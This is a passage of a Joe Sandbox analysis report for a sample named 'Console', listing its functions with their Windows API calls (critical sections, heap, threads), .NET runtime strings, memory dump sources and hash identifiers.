                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$FreeHeap$Enter
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 707808192-0
                                                                                                                                                                                                                          • Opcode ID: d397776087c5763fcf47e7944e57276b998bb3e3f66d103c1184883331a3f325
                                                                                                                                                                                                                          • Instruction ID: 493ce85bdcbd4377bd48fc6dbc3c8a1acb8dddfbaffb44a1f8262a59983b9740
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d397776087c5763fcf47e7944e57276b998bb3e3f66d103c1184883331a3f325
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17E1BF75E00209DFDB21CFA8D984BAEBBB2FF14314F18415AD904A7391CB75AE05DBA1
                                                                                                                                                                                                                          Function 01250060 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117threadsynchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetThreadDescription.KERNELBASE ref: 012500C5
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0125015B
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(0000020C,000000FF), ref: 01250186
                                                                                                                                                                                                                            • Part of subcall function 01236720: LeaveCriticalSection.KERNEL32(03C17714,?,03C176F0,0124FE08), ref: 01236731
                                                                                                                                                                                                                            • Part of subcall function 01236720: SleepEx.KERNEL32(000000FF,00000000,0124FE08), ref: 01236779
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Thread$CriticalCurrentDescriptionLeaveObjectSectionSingleSleepWait
                                                                                                                                                                                                                          • String ID: .NET Debugger$Debugger Thread spinning up
                                                                                                                                                                                                                          • API String ID: 3582553491-698254634
                                                                                                                                                                                                                          • Opcode ID: fb0af2ea7c72a134f565c4a59d9599fee92b7518f43305b3a7645f49f37557c6
                                                                                                                                                                                                                          • Instruction ID: 0ca92490d42daab2167839481580b69f9eb7f046b491c2e8e98b34cd8fe67635
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb0af2ea7c72a134f565c4a59d9599fee92b7518f43305b3a7645f49f37557c6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F410571E20216AFDB64DF68CD857AABFB4FF14710F10422AED15A7291EB709940CB91
                                                                                                                                                                                                                          Function 00FDE1C0 Relevance: 7.9, APIs: 6, Instructions: 443COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00FDE4AA
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00FDE4CB
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00FDE4EF
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00FDE513
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00FDE537
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00FDE55B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalInitializeSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 32694325-0
                                                                                                                                                                                                                          • Opcode ID: 6bcfa6b79debc0187a618dc2b981ab9829f6ec9bceb271b7af64a2b49f2177ce
                                                                                                                                                                                                                          • Instruction ID: a051d980482430dc0d5434e99e76e741faef02d68599f887cb5e05c8158887e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bcfa6b79debc0187a618dc2b981ab9829f6ec9bceb271b7af64a2b49f2177ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60128B70A007058FDB24DF24C884BAABBF5FF58314F18459ED85AAB390DB74AA45CF90
                                                                                                                                                                                                                          Function 00FF3D40 Relevance: 7.7, APIs: 3, Strings: 1, Instructions: 700stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000001,00000000,000000FF,?,?), ref: 00FF3F5E
                                                                                                                                                                                                                          • strncat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000001,0159D848,000000FF), ref: 00FF3F83
                                                                                                                                                                                                                          • strncat_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000001,00000001,000000FF,?,?), ref: 00FF3FA4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • NotSupported_CollectibleBoundNonCollectible, xrefs: 00FF42D4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strncat_s$strncpy_s
                                                                                                                                                                                                                          • String ID: NotSupported_CollectibleBoundNonCollectible
                                                                                                                                                                                                                          • API String ID: 2411846981-3079447967
                                                                                                                                                                                                                          • Opcode ID: f884e8177fccd055e6e499d81d082038fb4a170d6a2577fbe586b3737fa694fc
                                                                                                                                                                                                                          • Instruction ID: 442fee4f3a9575fed8dd86a43d91370ea942cba070f41fe4be72066c898caa7b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f884e8177fccd055e6e499d81d082038fb4a170d6a2577fbe586b3737fa694fc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90528D70A0020A9FDF14CF68C894BAEBBF5EF48324F148169E915AB3A1D734ED45DB91
                                                                                                                                                                                                                          Function 01478370 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DecodePointer.KERNEL32(?,00000000,00000000,?,014662C9,?,00000000), ref: 01478382
                                                                                                                                                                                                                          • DecodePointer.KERNEL32(?,FFFFFFFE,?,014662C9,?,00000000), ref: 01478394
                                                                                                                                                                                                                          • DecodePointer.KERNEL32(00003F34,?,014662C9,?,00000000), ref: 014783A1
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(014662C9,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 014783C3
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 014783CD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DecodePointer$Heap$FreeProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 631176825-0
                                                                                                                                                                                                                          • Opcode ID: d9ba28cf0adbffd2f19e8128e49f7370535024e286cfce9fe5e423ea8d9cfe10
                                                                                                                                                                                                                          • Instruction ID: b46a7dddee81672164be1fae24744de7fd1afeb7ec1b6cd24d4dfc5bbf25a2d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9ba28cf0adbffd2f19e8128e49f7370535024e286cfce9fe5e423ea8d9cfe10
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 680181315002179BEB215F2AEC4C98BFF29FF90611B21061BF214E2630EB7254B0CB60
                                                                                                                                                                                                                          Function 010844F0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 259threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 01084589
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • T::ST - recycling thread 0x%p (state: 0x%x), xrefs: 010845FB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentThread
                                                                                                                                                                                                                          • String ID: T::ST - recycling thread 0x%p (state: 0x%x)
                                                                                                                                                                                                                          • API String ID: 2882836952-1329013172
                                                                                                                                                                                                                          • Opcode ID: 94791e416114e39d1e77b620347c5ebb0bd10aa99b864dd4fd67f31e1280bc61
                                                                                                                                                                                                                          • Instruction ID: 217a4a82abc944849497a04e60c4946f2cef21eb2a16a09e4c7b5246cf90fefc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94791e416114e39d1e77b620347c5ebb0bd10aa99b864dd4fd67f31e1280bc61
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CB10730A08746DFEB65EF68C8447AEBBE0FF14304F0541ADD9D997281DBB46944CB91
                                                                                                                                                                                                                          Function 01047930 Relevance: 6.6, APIs: 5, Instructions: 350COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01647A28,7CAB6A82,03C16310,00000000,?,014C2691,000000FF,?,00FC3126,01647570,01647CF0,00000000), ref: 01047974
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01647C9C,?,00FC3126,01647570,01647CF0,00000000), ref: 01047998
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01647C64,?,00FC3126,01647570,01647CF0,00000000), ref: 010479BC
                                                                                                                                                                                                                            • Part of subcall function 0122E910: LeaveCriticalSection.KERNEL32(03C71B78,?,00000000,7CAB6A82,00000000,00000129,00000000,01084E25,7CAB6A82,00000000), ref: 0122E98C
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0163EAD0,?,?,00008000,015066C0,00000002,00000000,010695A0,00000018), ref: 01047D3C
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01506574,00003000,00001000,00000000,?,03C1B230,00000001,?,00000000,00000000,?,?,?,?,?), ref: 01047B69
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: GetProcessHeap.KERNEL32(?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002,00000002), ref: 01215CAC
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000002,?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002), ref: 01215CCA
                                                                                                                                                                                                                            • Part of subcall function 00FFE830: EnterCriticalSection.KERNEL32(00000000,?,00000000,03C176F0,00000000,?,010E27AE,?,01229EF5), ref: 00FFE8B9
                                                                                                                                                                                                                            • Part of subcall function 00FDC860: HeapFree.KERNEL32(00000000,00000000,03C0B7C0,00000000,01506564,01506474,?,?,01047D33,?,?,00008000,015066C0,00000002,00000000,010695A0), ref: 00FDC94E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Initialize$Heap$Leave$AllocateEnterFreeProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3617692385-0
                                                                                                                                                                                                                          • Opcode ID: f2c7a6ccc181490e9a963c485aafd184d10ad8a6b4625fc0a91508a7bd0aaaef
                                                                                                                                                                                                                          • Instruction ID: 34f1bb1099702fed61eada0465488efbc91f88dd88e6d440ca3e817464796458
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2c7a6ccc181490e9a963c485aafd184d10ad8a6b4625fc0a91508a7bd0aaaef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DE1AEB1A007059FEB20DF68C885BDABBF4EF44704F1441B9ED49AF285D7B56908CBA1
                                                                                                                                                                                                                          Function 00FC6020 Relevance: 6.4, APIs: 3, Strings: 1, Instructions: 394COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 00FC6279
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000004,00000009,?), ref: 00FC63A0
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000009,?), ref: 00FC63F1
                                                                                                                                                                                                                            • Part of subcall function 0115DFB0: SetEvent.KERNEL32(03C16350,03C16300,00000001,0115DCA4), ref: 0115E020
                                                                                                                                                                                                                            • Part of subcall function 0115DBC0: GetLastError.KERNEL32(00000000,00650072,03C176F0,?,7CAB6A82), ref: 0115DBCE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalLeaveSection$ErrorEventLast
                                                                                                                                                                                                                          • String ID: File load lock
                                                                                                                                                                                                                          • API String ID: 3394562845-3356667065
                                                                                                                                                                                                                          • Opcode ID: db15a210d23f266dc865d74678442aee355f61fab1a556d54da66c66cb37cd6b
                                                                                                                                                                                                                          • Instruction ID: 44de5082d0f3da23a4b794b72ab9ce8c27af6f5bec5942c38d67a95133221e09
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db15a210d23f266dc865d74678442aee355f61fab1a556d54da66c66cb37cd6b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00026A70D0824ACFDF24CFA8CA45BAEBBB0AF18314F14809DE845AB391D7759D45DB90
                                                                                                                                                                                                                          Function 00FD1A70 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(-00000004,?), ref: 00FD1B6B
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00FD1B8F
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00FD1BB3
                                                                                                                                                                                                                            • Part of subcall function 00FCCEF0: LeaveCriticalSection.KERNEL32(03C5C530,?,7CAB6A82,0CB3F4BC,CEA1900B,?), ref: 00FCCF74
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • RefEmit_InMemoryManifestModule, xrefs: 00FD1C7F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Initialize$Leave
                                                                                                                                                                                                                          • String ID: RefEmit_InMemoryManifestModule
                                                                                                                                                                                                                          • API String ID: 664292470-2496751632
                                                                                                                                                                                                                          • Opcode ID: dac28a05fdd9bc205dbc9b7de12a66670d8fe84814229ee218639d74b7111f73
                                                                                                                                                                                                                          • Instruction ID: 1a570dde4682a7662976eac76a051596d1da45226dbfedf3385d9a2d58ee5ec8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dac28a05fdd9bc205dbc9b7de12a66670d8fe84814229ee218639d74b7111f73
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33C18B71900605DFDB20DF68C844BAABBF1FF08314F14825EE855AB391DBB9AA45DBD0
                                                                                                                                                                                                                          Function 010621E0 Relevance: 6.1, APIs: 4, Instructions: 76threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetThreadErrorMode.KERNEL32(00008001,?), ref: 0106223C
                                                                                                                                                                                                                          • SetThreadErrorMode.KERNEL32(?,00000000,?,00000003,00000080), ref: 010622B5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorModeThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3782313741-0
                                                                                                                                                                                                                          • Opcode ID: 9f11ece7b7cc682df5eafb0e22a8902c6f8ab9efce64ed87717463baa99aa2f3
                                                                                                                                                                                                                          • Instruction ID: 775b29adf50d4fc58320554b725b5e032de35d855d8307c366715fc47c2cef05
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f11ece7b7cc682df5eafb0e22a8902c6f8ab9efce64ed87717463baa99aa2f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE21B175900216EFD720CFACC909B6EBBF8FB08720F21425DE851B76D0D7B4A9048B91
                                                                                                                                                                                                                          Function 01097970 Relevance: 6.0, APIs: 4, Instructions: 45threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetThreadErrorMode.KERNEL32(00008001,?,7CAB6A82,?,00000000), ref: 010979A9
